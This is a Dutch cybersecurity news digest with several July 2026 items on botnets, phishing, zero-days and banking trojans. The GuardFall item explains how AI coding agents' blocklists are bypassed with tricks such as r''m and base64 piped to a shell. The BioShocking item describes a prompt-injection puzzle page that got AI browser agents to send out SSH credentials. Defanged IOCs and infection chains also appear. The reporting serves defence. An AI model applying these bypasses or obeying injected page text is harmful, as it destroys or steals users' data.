De communicatie van RustDuck is eveneens zwaar beveiligd. Het versleutelt zijn verkeer met moderne versleutelingsalgoritmen: ChaCha20-Poly1305 voor de handshake en AES-GCM zodra het commando's ontvangt. De sleutels worden afgeleid met HKDF-SHA256 en een Curve25519-uitwisseling, rouleren elke tien minuten en de verbinding wordt gemaskeerd als gewoon versleuteld webverkeer om op te gaan in het netwerkverkeer.

Zodra een apparaat is ingecheckt, kunnen de operators een korte lijst met opdrachten versturen, zoals een aanval starten, stoppen, status rapporteren, overschakelen naar nieuwe controle-servers, of de malware geruisloos upgraden naar een nieuwere versie. De controleadressen maken gebruik van gratis dynamische DNS-diensten zoals duckdns.org, waar de "Duck" in de naam vandaan komt.

RustDuck past in een groter patroon van botnets die de overstap maken naar Rust. In april 2025 documenteerde Fortinet bijvoorbeeld RustoBot, een op Rust gebaseerd botnet dat zich verspreidde via Totolink en andere routers om DDoS aanvallen uit te voeren, met een vergelijkbaar recept, namelijk goedkope routers, een moderne programmeertaal en on-demand overstroming van verkeer. De opkomst van RustDuck valt samen met een intens jaar voor DDoS aanvallen. Soortgelijke, opgeschaalde botnets, zoals AISURU en gerelateerde netwerken met meer dan drie miljoen gekaapte apparaten, veroorzaakten aanvallen van bijna 30 Tbps voordat een door de VS geleide operatie hun infrastructuur dit voorjaar ontmantelde. Hoewel RustDuck nu nog klein is, baart de richting waarin het zich ontwikkelt zorgen.

Een opmerkelijk detail is dat het actiefste verspreidingsadres van RustDuck, 176.65.139[.]204, zich in hetzelfde kleine IP-blok bevindt als de server achter een afzonderlijk DDoS-botnet dat zich richt op ADB en in het voorjaar van 2026 werd gemeld. Dit kan toeval zijn of gedeelde bulletproof hosting, en XLab legt geen direct verband tussen de twee, maar de overlapping is het onderzoeken waard.

Er bestaat geen specifieke patch voor RustDuck zelf, aangezien het malware is en geen enkelvoudige kwetsbaarheid. De verdediging tegen deze dreiging omvat het sluiten van de toegangsdeuren die het gebruikt:

*   Verwijder beheerinterfaces op afstand van het openbare internet. Schakel Android Debug Bridge, Telnet en SSH uit waar ze niet nodig zijn, en laat ze nooit bereikbaar met standaardwachtwoorden.

*   Patch systemen waar mogelijk en vervang systemen die niet meer gepatcht kunnen worden. Voor Apache CouchDB zijn er vaste releases om naar te upgraden, maar sommige van de genoemde routers zijn end-of-life. Voor de D-Link DIR-823X adviseert CISA om het apparaat uit dienst te nemen in plaats van te wachten op een patch die niet zal komen, en de fabrikant van Totolink reageerde nooit op de openbaarmaking. Niet-ondersteunde apparatuur moet worden vervangen, niet gerepareerd.

*   Blokkeer de bekende indicatoren van compromis (IOC's).

 

Bron: QiAnXin's XLab | Bron 2: nvd.nist.gov | Bron 3: blog.xlab.qianxin.com

01 juli 2026 | GuardFall onthult shellinjectie kwetsbaarheden in open-source AI-coding agents

Nieuw onderzoek van Adversa AI, genaamd GuardFall, heeft aangetoond dat een veiligheidscontrole die ontworpen is om AI-coding agents te weerhouden van het uitvoeren van gevaarlijke commando's, omzeild kan worden met een techniek die al decennia bekend is in de shell-programmering. De bevindingen laten zien dat deze bypass werkt tegen tien van de elf populaire open-source agents voor codering en computergebruik die door het bedrijf zijn getest. Slechts één agent, "Continue", bleek hiertegen te zijn beveiligd.

De kwetsbaarheid is significant omdat deze agents shell-commando's uitvoeren met volledige accounttoegang van de gebruiker. Als een agent gericht wordt op een kwaadaardige repository of softwarepakket, kan een verborgen instructie stilletjes commando's uitvoeren die bestanden wissen of gevoelige gegevens stelen. Dit omvat bijvoorbeeld SSH-sleutels, cloud-credentials en andere informatie die toegankelijk is vanuit de thuismap van het account.

De kern van het probleem ligt in de manier waarop de agents hun beveiligingscontroles uitvoeren. De meeste agents proberen veilig te blijven door elk commando te controleren tegen een blokkeerlijst van gevaarlijke patronen voordat het wordt uitgevoerd. Het gebrek hierin is dat de controle het commando als platte tekst analyseert, terwijl bash (de shell) die tekst herschrijft voordat het daadwerkelijk wordt uitgevoerd. De shell verwijdert aanhalingstekens en expandeert snelkoppelingen, waardoor het filter en de shell uiteindelijk twee verschillende dingen zien. Een eenvoudig voorbeeld hiervan is dat een filter dat zoekt naar `rm` niets verkeerds ziet in `r''m`, omdat dit voor een tekstvergelijker verschillende strings zijn. Bash verwijdert echter de lege aanhalingstekens en voert `rm` alsnog uit. Dit principe werkt ook in andere vormen, zoals een commando dat verborgen is in base64 en via een pipe naar een shell wordt gestuurd, of standaard tools zoals `find` en `dd` die destructief worden gemaakt met de juiste vlag.

De onderzoekers beschrijven dit niet als een bug, maar als "een gevaarlijke conventie en een klasse van problemen", wat verklaart waarom het toevoegen van meer patronen aan een blokkeerlijst het probleem niet oplost. Er is dan ook geen enkel CVE-nummer om te volgen of te patchen. Twee factoren moeten samenvallen voor een succesvolle aanval, en geen van beide is ongebruikelijk. Ten eerste moet de AI het kwaadaardige commando produceren. Een direct commando als "run `rm -rf`" wordt meestal geweigerd, maar hetzelfde commando, verborgen in normaal ogend werk zoals een buildbestand of een documentatie-antwoord van een tool, kan als een routinestap worden uitgevoerd. Ten tweede moet de agent zelfstandig draaien, met een vlag voor automatische uitvoering ingeschakeld of de containersandbox uitgeschakeld. Beide zijn routine in geautomatiseerde pipelines. De live tests hiervoor werden uitgevoerd met Claude Sonnet 4.6.

De overige tien geteste tools, namelijk opencode, Goose, Cline, Roo-Code, Aider, Plandex, Open Interpreter, OpenHands, SWE-agent en het Hermes project, lieten allemaal de kwetsbaarheid open. De bug dook voor het eerst op in het Hermes project en is daar gedocumenteerd in de issue tracker van Hermes zelf. De tools die in het onderzoek van Adversa zijn opgenomen, hadden gezamenlijk ongeveer 548.000 GitHub-sterren in mei 2026. Adversa demonstreerde de volledige aanval end-to-end tegen de Plandex productiebinaire, en een vergelijkbare aanval werkte tegen acht andere tools. Adversa beschrijft het werk als laboratoriumonderzoek; er is geen publieke exploitatie gemeld.

"Continue", de enige agent die standhield, verdedigt zich door het commando te lezen zoals bash het zou doen voordat het een beslissing neemt. Het breekt het commando op in dezelfde delen als de shell, controleert wat daadwerkelijk wordt uitgevoerd en handhaaft een harde lijst van destructieve commando's die volledig worden geblokkeerd. Deze bescherming bleek effectief tegen alle payloads in de standaard editormodus van Continue. De modus voor automatische uitvoering via de commandoregel is echter zwakker; enkele payloads kwamen erdoorheen, hoewel de meest destructieve nog steeds de harde blokkering raakten. Adversa noemt het ontwerp draagbaar en stelt dat het herimplementeren ervan ongeveer twee dagen werk is voor een ervaren engineer.

Hoewel er geen complete oplossing is, kunnen snelle oplossingen de blootstelling verminderen totdat een adequate bescherming is geïmplementeerd. Dit omvat het draaien van agents met `$HOME` gericht op een wegwerpmap, zodat gevoelige gegevens zoals `~/.ssh` en `~/.aws` buiten bereik blijven. Daarnaast wordt aangeraden om vlaggen voor automatische uitvoering, zoals `--auto-exec`, `--auto-run`, `--auto-test` en `dangerously-skip-permissions`, uit te schakelen, tenzij de taak echt niet gepauzeerd kan worden voor menselijke tussenkomst. Agents mogen ook niet worden uitgevoerd op pull requests van forks, aangezien dit een eenvoudig pad is voor een aanvaller om toegang te krijgen tot gevoelige gegevens. Tot slot moeten configuratiebestanden die in een repository worden geleverd, zoals `.aider.conf.yml`, als onbetrouwbare code worden behandeld, omdat een kwaadaardig bestand de aanval kan activeren bij de eerste geaccepteerde bewerking.

GuardFall sluit aan bij een reeks vergelijkbare bevindingen dit jaar. Adversa's eigen TrustFall trof Claude Code, Cursor, Gemini CLI en Copilot CLI, en een afzonderlijke bypass van een ontkenningregel trof Claude Code. Aanvallen zoals AutoJack en Agentjacking transformeerden vergiftigde inhoud in commando's die een agent uitvoert met de rechten van de eigenaar. De gemeenschappelijke factor is eenvoudig. Onbetrouwbare tekst bereikt een echte shell voordat de beveiliging begrijpt wat bash daadwerkelijk zal uitvoeren.

 

Bron: NousResearch | Bron 2: github.com | Bron 3: adversa.ai

01 juli 2026 | Hackers misbruiken WK 2026 T-shirt aanbiedingen voor Voidrift malware

Oplichters maken misbruik van de opwinding rond het FIFA Wereldkampioenschap 2026 om werknemers te lokken met een nieuwe e-mailscam. Onderzoek van Cofense Intelligence onthult dat e-mails worden verstuurd met aanbiedingen voor gratis, exclusieve WK T-shirts, waarbij wordt beweerd dat de FIFA een samenwerking is aangegaan met de werkgever van het slachtoffer. Deze berichten zijn bedoeld om werknemers te verleiden een kwaadaardig programma op hun werkcomputers te downloaden.

Zodra een werknemer op de link klikt, kunnen de aanvallers initiële toegang tot het bedrijfsnetwerk verkrijgen. Dit stelt hen in staat om bedrijfsactiviteiten te bespioneren, bedrijfsdata te stelen of gevoelige bedrijfsaccounts te compromitteren. De e-mails zijn bijzonder gevaarlijk omdat ze zeer realistisch ogen. Oplichters doen grondig onderzoek naar hun doelwitten voordat ze de berichten versturen en plaatsen zelfs de naam van de werknemer, de bedrijfsnaam en het bedrijfslogo direct op afbeeldingen van de nepmerchandise. Deze tactiek wekt vertrouwen en moedigt snelle klikken op de link aan.

Cofense onderzoekers rapporteerden dat deze nep-e-mails moeiteloos langs belangrijke beveiligingstools kwamen. De campagne omzeilde met succes drie veelgebruikte e-mailbeveiligingsprogramma's: Cisco IronPort, Microsoft ATP en Abnormal Security. De onderzoekers merkten op dat de malware, genaamd Voidrift, wordt gehost op een legitiem websitedomein. Dit maakt het voor standaard beveiligingssystemen erg moeilijk om de dreiging te detecteren.

Nadat Voidrift is gedownload, verbergt het zich in de computer. Het is ontworpen om stil te opereren zonder te worden opgemerkt, waardoor beveiligingsteams de infectie niet gemakkelijk kunnen vinden of erop kunnen reageren. Cofense onderzoekers waarschuwen dat "traditionele e-mailbeveiligingscontroles niet betrouwbaar zijn om deze campagne te stoppen."

Omdat de malware geautomatiseerde systemen omzeilt, hebben bedrijven betere manieren nodig om zichzelf te beschermen. Deze campagne toont aan hoe snel oplichters grote wereldwijde evenementen gebruiken om slimme trucs te creëren. Geautomatiseerde beveiligingsfilters alleen zijn niet langer voldoende om deze e-mails uit inboxes te houden. Cofense legde uit dat vertrouwen op mensen om verdachte e-mails te rapporteren een betere verdediging is. Aangezien door mensen gerapporteerde intelligentie rechtstreeks afkomstig is van wat werknemers in hun inboxes zien, in plaats van geautomatiseerde grenscontroles, helpt het teams om dreigingen te vangen die beveiligingssoftware mist.

Werknemers moeten alert blijven en voorkomen dat ze op links klikken in onverwachte e-mails die gratis toernooispullen aanbieden, zelfs als de berichten officiële bedrijfslogo's bevatten. Max Gannon, de manager van het cyberintelligentieteam bij Cofense, deelde zijn gedachten over de dreiging. Hij legde uit dat wereldwijde sportevenementen zoals het FIFA Wereldkampioenschap een groot doelwit creëren voor aanvallers, omdat iedereen er enthousiast over wordt.

Gannon benadrukte de mate van onderzoek die de aanvallers verrichtten: "Wat deze campagne onderscheidt van alledaagse phishing is het niveau van onderzoek dat de aanvallers deden voordat ze een enkele e-mail verstuurden." Hij voegde eraan toe dat de aanvallers de naam van elke ontvanger, de naam van hun werkgever en het bedrijfslogo direct in de afbeeldingen inbedden, wat een bewuste inspanning en verkenning vereist. De tijdsdruk en schaarstetactieken, zoals 'slechts de eerste 100 mensen kunnen dit claimen', zijn veel geloofwaardiger wanneer ze gekoppeld zijn aan een echt, spraakmakend evenement waar mensen al emotioneel bij betrokken zijn.

Gannon wees er ook op hoe gevaarlijk de software is zodra deze langs filters glipt. "Deze campagne omzeilde drie afzonderlijke veilige e-mailgateways, wat betekent dat de getroffen organisaties elke redelijke verdediging hadden en toch werden getroffen. Zodra Voidrift landt, is het specifiek ontworpen om de tools te weerstaan die beveiligingsteams gebruiken om het te analyseren en te detecteren, dus elke laag van deze aanval was gebouwd om te slagen," verklaarde hij.

Om veilig te blijven, adviseerde Gannon werknemers om argwaan te hebben bij onverwachte e-mails die beloningen aanbieden. "Als een e-mail uw naam, uw werkgever en uw bedrijfslogo kent, is dat geen bewijs dat het legitiem is. In dit geval was het tegendeel waar. Organisaties moeten accepteren dat geen enkele e-mailbeveiligingsgateway voldoende is. Wanneer aanvallers actief meerdere platforms tegelijk testen en ontwijken, komt het enige betrouwbare signaal van mensen die verdachte e-mails rechtstreeks vanuit hun inboxes rapporteren."

 

Bron: Cofense

01 juli 2026 | Barracuda waarschuwt voor geavanceerde phishing met echte pagina's van Microsoft

Onderzoekers van Barracuda waarschuwen voor geavanceerde dreigingen via e-mail die legitieme Microsoft-inlogpagina's en split-click knoppen misbruiken. De afgelopen maand zijn diverse geraffineerde e-mail dreigingen geïdentificeerd die zich richten op organisaties en hun medewerkers. De aanvallers maken daarbij gericht misbruik van legitieme Microsoft-diensten en zetten nieuwe phishingtechnieken in. Volgens het rapport worden zelfs getrainde medewerkers effectief misleid, doordat aanvallers echte Microsoft-inlogpagina's gebruiken en beveiligingscontroles weten te omzeilen.

Een van de waargenomen methoden is de Tycoon 2FA-aanval. Hierbij ontvangen gebruikers een geloofwaardige waarschuwing over een volle inbox, inclusief een agenda-uitnodiging die hen naar een echte Microsoft-inlogpagina leidt. Deze pagina wordt echter via het Tycoon 2FA phishing-as-a-service platform omgeleid, met als doel het stelen van sessietokens. Dit geeft aanvallers directe toegang tot Microsoft 365-diensten en e-mailaccounts van de slachtoffers.

Barracuda signaleert tevens een zeldzame split-click techniek. Hierbij bevat een e-mail een knop die, afhankelijk van de kliklocatie, twee verschillende acties uitvoert. Als bovenaan op de knop wordt geklikt, opent een legitieme Microsoft-pagina. Een klik onderaan de knop leidt echter naar een phishingpagina via een blob URL en het Sneaky 2FA-platform. Deze methode omzeilt automatische beveiligingsanalyse, waardoor enkel de veilige links zichtbaar zijn voor securitytools.

Daarnaast verplaatsen aanvallers verdachte links uit e-mails naar PDF-bijlagen om detectie te ontwijken. Gebruikers worden gelokt naar een nep authenticatieproces voor apparaten dat inloggegevens kaapt. De phishinginfrastructuur bevat bovendien een automatische 'kill switch', waardoor phishingpagina's na korte tijd verdwijnen en forensisch onderzoek bemoeilijkt wordt.

Barracuda waarschuwt ook voor een groeiende trend waarbij phishingcampagnes direct malware afleveren. Schadelijke scripts worden vermomd als facturen of officiële documenten en maken gebruik van technieken zoals steganografie en uitvoering zonder bestanden via Windows ActiveX. Dit zorgt ervoor dat traditionele endpointbeveiliging de malware moeilijk opmerkt, omdat er geen sporen op de schijf achterblijven.

 

Bron: Barracuda | Bron 2: itdaily.com

01 juli 2026 | Nieuwe BioShocking aanval misleidt AI-browsers om inloggegevens te lekken

Beveiligingsonderzoeker LayerX heeft een nieuwe aanvalstechniek genaamd BioShocking onthuld, die AI-browsers en assistenten kan misleiden om gebruikersgegevens te lekken. De methode slaagde erin zes verschillende browsers met AI-functionaliteit te foppen, waaronder OpenAI's ChatGPT Atlas, Perplexity's Comet en de browser-extensie van Anthropic's Claude.

Een browser met AI-functionaliteit, of AI-agent, onderscheidt zich door het vermogen om namens de gebruiker te handelen, niet alleen webpagina's te lezen. In de 'agent modus' kan zo'n browser klikken, typen en toegang krijgen tot websites waarop de gebruiker reeds is ingelogd. Hoewel deze functionaliteit het primaire doel is, vormt het tevens een aanzienlijk risico.

De BioShocking-techniek maakt gebruik van de manier waarop deze AI-agenten informatie verwerken. De inhoud van een webpagina en de instructies van de gebruiker worden als één doorlopende tekststroom gelezen. Dit stelt een kwaadaardige webpagina in staat om schadelijke commando's te introduceren, vermomd als reguliere inhoud of spelregels. De AI-agent is niet in staat om dit onderscheid betrouwbaar te maken, een kwetsbaarheid die door onderzoekers "indirect prompt injection" wordt genoemd.

De aanval begint met een webpagina die is ontworpen als een puzzel. Passend bij het dystopische thema van de puzzel, worden verkeerde antwoorden beloond, bijvoorbeeld door te stellen dat 2 + 2 = 5. Zodra de AI-agent accepteert dat 'fout' de winnende zet is, volgt deze de logica van het spel in plaats van de ingebouwde veiligheidsmechanismen. De laatste stap van de puzzel vraagt de agent vervolgens om de inloggegevens van de gebruiker te kopiëren. Geen van de zes geteste AI-agenten weigerde deze actie uit te voeren.

Het gevaarlijke aspect van deze aanval schuilt in de brede toegang die de agent heeft. Tijdens de test werd een link naar de GitHub-repository voor werk van het slachtoffer gestuurd, waar de agent SSH-inloggegevens ophaalde en deze doorstuurde naar de aanvaller. LayerX gebruikte een onschadelijk plattekstbestand voor de test, maar dezelfde techniek zou de agent kunnen richten op andere bronnen die deze binnen dezelfde sessie kan bereiken, zoals openstaande tabbladen, ingelogde accounts en interne bedrijfstools. De AI-agent aarzelde niet en rapporteerde de diefstal achteraf zelfs vrolijk als een overwinning.

De naam BioShocking verwijst naar het spel BioShock, waarin een gehersenspoeld personage gehoorzaamt aan de activeringszin "Would you kindly?". Op een vergelijkbare manier vertrouwt de AI-agent op de context die hem wordt aangereikt. Door de context te veranderen, verandert ook het gedrag van de agent. LayerX heeft dit patroon eerder aangetoond, waarbij het liet zien dat één klik de Perplexity's Comet-agent kon kapen en ongemerkt gegevens kon stelen.

LayerX rapporteerde het probleem tussen oktober 2025 en januari 2026 aan de verschillende leveranciers. OpenAI heeft de kwetsbaarheid in ChatGPT Atlas verholpen. Perplexity sloot het rapport zonder actie te ondernemen. Fellou, Genspark en Sigma reageerden niet op de melding. Anthropic probeerde de extensie van Claude te patchen, maar volgens LayerX was de oplossing niet effectief.

Om de aanval te stoppen, adviseert LayerX dat browsers met AI-functionaliteit altijd toestemming moeten vragen voordat zij gegevens van ingelogde accounts lezen. Een vraag zoals: "Ik sta op het punt gegevens van uw GitHub-repository te kopiëren. Doorgaan?", zou de aanvalsketen doorbreken. Daarnaast zouden AI-agenten moeten detecteren wanneer een pagina aangeeft dat de normale regels niet langer van toepassing zijn, en gebruikers de mogelijkheid moeten bieden om strikte limieten in te stellen op wat een agent mag aanraken. Het winnen van een spel is geen legitieme reden om een privé-repository te openen.

Voor gebruikers is het advies beknopter. Wees voorzichtig met de agent modus. Alles waarop u bent ingelogd, kan potentieel worden misbruikt, dus bepaal welke toegang de browser moet hebben en sluit deze af wanneer u klaar bent. Voor beveiligingsteams geldt dezelfde logica op grotere schaal. Een AI-browser in agent modus functioneert als een extra account met toegang tot bedrijfssystemen. Deze moet de meest beperkte toegang krijgen die nodig is voor een specifieke taak, in plaats van een permanente toegang tot alles wat de gebruiker kan bereiken. De gemeenschappelijke conclusie van deze bevindingen is dat het verlenen van toegang tot uw ingelogde accounts aan een AI-agent een 'jailbreak' van een truc in concrete, reële toegang verandert.

 

Bron: LayerX

01 juli 2026 | Apple versnelt updates wegens zorgen over door AI gedreven exploitontwikkeling

Apple heeft onlangs een reeks beveiligingsupdates voor zijn populaire iPhones, iPads en Macs versneld uitgebracht. Deze ongebruikelijk snelle distributie is volgens een verklaring van het technologiebedrijf aan persbureau Reuters ingegeven door groeiende zorgen over de potentie van kunstmatige intelligentie (AI) om het proces van exploitontwikkeling aanzienlijk te versnellen. De versnelde uitrol is een proactieve maatregel, aangezien Apple heeft aangegeven dat er geen bewijs is dat de nu gepatchte kwetsbaarheden al actief zijn misbruikt in het wild.

De updates, die specifiek betrekking hebben op macOS Tahoe 26.5.2, iOS 26.5.2 en iPadOS 26.5.2, adresseren diverse beveiligingslekken. De meeste van deze kwetsbaarheden kunnen leiden tot ongewenste systeemcrashes of het disfunctioneren van applicaties. Een kritiek aspect van de verholpen problemen is de mogelijkheid voor aanvallers om via deze lekken "gevoelige gebruikersinformatie" te stelen. Apple heeft ervoor gekozen om de precieze aard van deze gevoelige informatie niet nader te specificeren.

In een afwijking van de standaardprocedure heeft Apple besloten deze belangrijke beveiligingspatches onmiddellijk uit te rollen, in plaats van te wachten met de integratie ervan in de geplande 26.6-versies van de besturingssystemen. Deze strategie is direct gerelateerd aan de vrees dat systemen met AI de capaciteit hebben om de tijd die nodig is om kwetsbaarheden om te zetten in effectieve aanvalsmiddelen drastisch te verkorten. Het bedrijf streeft ernaar de periode tussen de publieke bekendmaking van een patch en het moment dat gebruikers deze kunnen downloaden en installeren te verkorten, om zo de venster van kwetsbaarheid te minimaliseren.

Deze ontwikkeling bij Apple illustreert een bredere trend in de cybersecuritywereld, waarbij de snelheid en complexiteit van dreigingen toenemen door technologische vooruitgang zoals AI. Fabrikanten worden hierdoor gedwongen om hun responsstrategieën en updatecycli te heroverwegen om gelijke tred te houden met de evoluerende methoden van cybercriminelen. De verschuiving in Apple's patchbeleid benadrukt de dringende noodzaak voor zowel ontwikkelaars als gebruikers om alert te blijven op nieuwe dreigingsvectoren die door AI kunnen worden versneld.

 

Bron: Reuters | Bron 2: support.apple.com

01 juli 2026 | Nissan Americas getroffen door datalek via Oracle PeopleSoft zero-day

Nissan Americas heeft een datalek openbaar gemaakt na een cyberaanval waarbij kwaadwillenden misbruik maakten van een nog onbekende kwetsbaarheid (zero-day) in Oracle PeopleSoft. Deze kwetsbaarheid, aangeduid met CVE-2026-35273, stelde aanvallers in staat om toegang te verkrijgen tot gevoelige gegevens.

Het incident heeft mogelijk persoonlijke, financiële, fiscale en identificatiegegevens van zowel huidige als voormalige werknemers blootgelegd. De impact van het datalek strekt zich uit over meerdere landen, waaronder de Verenigde Staten, Canada, Mexico en Brazilië, waar Nissan Americas actief is.

De exploitatie van een zero-day kwetsbaarheid in een veelgebruikt bedrijfssoftwarepakket zoals Oracle PeopleSoft benadrukt de aanhoudende uitdagingen voor organisaties bij het beveiligen van hun systemen tegen geavanceerde dreigingen. Het is cruciaal dat bedrijven die PeopleSoft gebruiken alert zijn op patches en updates zodra deze beschikbaar komen, om vergelijkbare aanvallen te voorkomen. Dit incident onderstreept de noodzaak voor proactieve beveiligingsmaatregelen en gedegen incidentrespons.

 

Bron: Cybercrimeinfo

01 juli 2026 | Dreigingsactor adverteert vermeende zeroday voor Veeam Backup & Replication

Op een cybercrimeforum is een advertentie verschenen waarin een dreigingsactor een vermeende zeroday aanbiedt voor Veeam Backup & Replication 12.x. De actor beweert dat het gaat om een remote code execution (RCE) op systeemniveau die geen authenticatie vereist. Volgens de advertentie omzeilt deze exploit de patch die in juni 2026 is uitgebracht voor CVE-2026-44963.

De geclaimde kwetsbaarheid zou geen inloggegevens of gebruikersinteractie vereisen en levert systeemrechten (NT AUTHORITY SYSTEM) op alle 12.x-builds van de software van Veeam, inclusief de meest recente versie 12.3.2.4854. De verkoper claimt een werkende proof-of-concept, de exploitbroncode, technische documentatie en een scanner te kunnen leveren aan potentiële kopers. Er wordt tevens beweerd dat versie 13.x van Veeam Backup & Replication niet wordt getroffen door deze vermeende zwakte, vanwege architecturale wijzigingen in die versie.

Deze beweringen zijn momenteel niet geverifieerd. Er is geen openbaar bewijs beschikbaar dat het bestaan of de effectiviteit van deze specifieke exploit bevestigt. Het is belangrijk op te merken dat de eerder bekende kwetsbaarheid CVE-2026-44963 een geauthenticeerde RCE betrof, die door Veeam is verholpen. De huidige forumclaim gaat over een afzonderlijke, onbevestigde variant die geen authenticatie zou vereisen.

Organisaties die Veeam Backup & Replication draaien, worden geadviseerd om leverancierswaarschuwingen nauwlettend te volgen. Daarnaast is het raadzaam de managementinterface van de software af te schermen van onvertrouwde netwerken en logs regelmatig te controleren op verdachte activiteit.

 

Bron: Cybercrimeinfo

02 juli 2026 | Nieuwe SEO-vergiftiging misbruikt ScreenConnect om AsyncRAT te installeren

Onbekende dreigingsactoren maken misbruik van de remote access tool ScreenConnect om de AsyncRAT-malware te implementeren en uit te voeren. Dit is onderdeel van een omvangrijke, multi-domein en meertalige campagne die malafide installer archieven verspreidt, gehost op vervalste websites. Dit werd ontdekt door het Russische cybersecuritybedrijf Kaspersky.

De installatiebestanden doen zich voor als populaire software zoals OBS Studio, DNS Jumper, DS4Windows en Bandicam. Kaspersky heeft meer dan 90 domeinnamen geïdentificeerd, gelokaliseerd in tien talen, waaronder Engels, Russisch, Chinees, Duits, Frans, Spaans, Portugees en Arabisch. Sommige van deze domeinen zijn opgezet tussen augustus 2025 en maart 2026.

Volgens beveiligingsonderzoeker Denis Kulik bundelen de kwaadaardige archieven een legitiem, ondertekend Microsoft install.exe binair bestand samen met een kwaadaardige install.res.1033.dll bibliotheek. Deze bibliotheek wordt via DLL side-loading op het apparaat geladen en implementeert vervolgens de ScreenConnect service. Deze service wacht op verdere instructies van de dreigingsactoren, waardoor zij controle kunnen behouden over gecompromitteerde systemen, variërend van individuele gebruikers tot organisaties.

Zodra ScreenConnect actief is, creëert en executeert de service een PowerShell script met de naam "Fj5NmEsp9EuKrun.ps1". Dit script configureert uitsluitingen voor Microsoft Defender, schakelt User Account Control (UAC) prompts uit en creëert vervolgens een Visual Basic Script (VBScript) bestand genaamd "installer_method3_stream.vbs". Dit script creëert op zijn beurt een reeks van vijf bestanden in de directory "C:\Users\Public".

In de volgende fase wordt "script.vbs" geactiveerd, een script dat verantwoordelijk is voor het beëindigen van alle actieve PowerShell processen en het uitvoeren van "cap.ps1" in een verborgen venster. Het primaire doel van dit PowerShell script is het lezen van de inhoud van het bestand "secret_bytes.txt", hieruit de AsyncRAT module te extraheren en deze uit te voeren met behulp van process hollowing.

De AsyncRAT malware legt vervolgens een verbinding met een externe server, specifiek "mora1987.work[.]gd". Dit stelt de dreigingsactor in staat om heimelijk geïnfecteerde Windows systemen te beheren, gevoelige gegevens te stelen en gebruikersactiviteit te monitoren door de scherminhoud op te nemen. Persistentie wordt bewerkstelligd door middel van een geplande taak, genaamd "MasterPackager.Updater", die elke twee minuten wordt geactiveerd om "script.vbs" uit te voeren, waardoor de aanval ook na een systeemherstart doorgaat.

Kaspersky benadrukt dat de dreigingsactor ScreenConnect camoufleert als populaire hulpprogramma's en deze verspreidt via frauduleuze websites die officiële productpagina's nabootsen. De aanvallers maken hierbij gebruik van zoekmachineoptimalisatie (SEO) technieken om deze malafide sites naar de top van zoekresultaten in zoekmachines zoals Google en Bing te stuwen.

 

Bron: Kaspersky | Bron 2: forcepoint.com

02 juli 2026 | Ousaban bankiertrojan gebruikt geavanceerde technieken tegen Iberische bankgebruikers

Een nieuwe campagne van de Braziliaanse bankiertrojan Ousaban richt zich op Windows-gebruikers met bankrekeningen in Spanje en Portugal. Onderzoekers van Fortinet's FortiGuard Labs identificeerden de campagne in mei 2026. De aanval begint met een phishing PDF die zich voordoet als een beschadigd bestand en controleert of de bezoeker zich daadwerkelijk in Spanje of Portugal bevindt, waarna de payload wordt verborgen in een afbeelding.

Het hoofddoel van Ousaban is het stelen van bankgegevens en het overnemen van accounts. De trojan nestelt zich op een Windows-pc en wacht tot de gebruiker een bankwebsite opent. Zodra een van de meer dan twee dozijn doelbanken, waaronder Banco Santander, BBVA, CaixaBank, Bankinter en Caixa Geral de Depósitos, wordt geladen, kan Ousaban screenshots en toetsaanslagen vastleggen, het klembord manipuleren, valse berichten weergeven en de aanvaller op afstand controle geven over de sessie. Deze functionaliteiten stellen de aanvallers in staat om een live banksessie te kapen en een account over te nemen.

De infectieketen start met een phishing PDF die de gebruiker verleidt om op een "Atualizar" (Update) knop te drukken, wat een kwaadaardige webpagina opent. Verborgen JavaScript in de PDF kan deze pagina ook automatisch openen. De webpagina doet zich voor als een portaal voor belastingdocumenten en installers, terwijl het bezoekers screent. Eerdere versies van Ousaban voerden deze controles in de browser uit, waarbij het IP-adres, de taal en de tijdzone van de bezoeker werden geanalyseerd. Ook werden VPN-gebruikers geblokkeerd en geautomatiseerde beveiligingstools gefilterd door details zoals schermgrootte en geïnstalleerde lettertypen te controleren. De huidige versie verplaatst deze screening naar de server van de operator, waardoor de exacte regels verborgen blijven. Bezoekers buiten Spanje of Portugal ontvangen een Spaanse "toegang geweigerd" melding in plaats van de malware.

Na een succesvolle screening wordt een script gedownload dat een afbeelding binnenhaalt. Deze afbeelding lijkt op een PDF-icoon, maar verbergt een ZIP-bestand via steganografie. Het script pakt Ousaban uit het ZIP-bestand, voert het uit en verwijdert vervolgens de afbeelding, het ZIP-bestand en zichzelf om zo min mogelijk sporen achter te laten. Eenmaal actief voegt Ousaban een registervermelding met de naam 'Financeiro' (Portugees voor "financiën") toe, zodat het bij elke Windows-opstart wordt geactiveerd.

De command and control (C2) server van Ousaban is doelbewust moeilijk te traceren. De malware bevat een Pastebin-link die naar een serveradres verwijst, maar Fortinet stelt dat dit adres een lokmiddel is. Het verbergen van deze details in webdiensten is een oude gewoonte van Ousaban; eerdere campagnes bewaarden de configuratie in Google Docs. De huidige versie verandert de echte C2-server dagelijks. De malware leest de huidige datum van een Google-pagina, construeert een webadres uit die datum plus een vast geheim, en zoekt dit op. Het blokkeren van het adres van de vorige dag is hierdoor ineffectief.

Ousaban, ook bekend als Javali, behoort tot de "Tetrade" van Braziliaanse bankiertrojans, waartoe ook Grandoreiro, Guildma en Melcoz behoren. Deze families zijn ontstaan in Brazilië en hebben zich verspreid naar Spanje en Portugal, waarbij ze code van elkaar leenden. Ousaban's stringversleuteling is hetzelfde aangepaste schema dat door een andere familie, Casbaneiro, wordt gebruikt. Grandoreiro, de bekendste van de groep, toont de duurzaamheid van deze aanpak. Het overleefde een door Interpol gecoördineerde takedown in januari 2024 en was binnen enkele maanden weer actief, waarbij het dezelfde tactieken gebruikte om downloads te verbergen achter PDF-achtige lokmiddelen en landcontroles.

Fortinet linkt dezelfde infrastructuur aan Ousaban-activiteit eind 2025 die andere toegangspunten gebruikte, waaronder "ClickFix", een scam waarbij het slachtoffer wordt verleid om zelf een kwaadaardig commando te plakken onder het mom van het oplossen van een fout.

Om deze dreiging tegen te gaan, wordt geadviseerd om elke PDF of e-mail die beweert dat een bestand beschadigd is en vraagt om op "Update" te drukken, als verdacht te behandelen. Hetzelfde geldt voor prompts die gebruikers vragen een commando te plakken om een "fout" te herstellen. Onverwachte bijlagen met facturen of belastingdocumenten, vooral in Spanje en Portugal, moeten als verdacht worden beschouwd. Server-side screening betekent dat geautomatiseerde sandboxes mogelijk alleen de Spaanse foutpagina ontvangen in plaats van de malware, waardoor gateway-detonatie alleen de dreiging kan missen. De campagne treft uitsluitend Windows systemen.

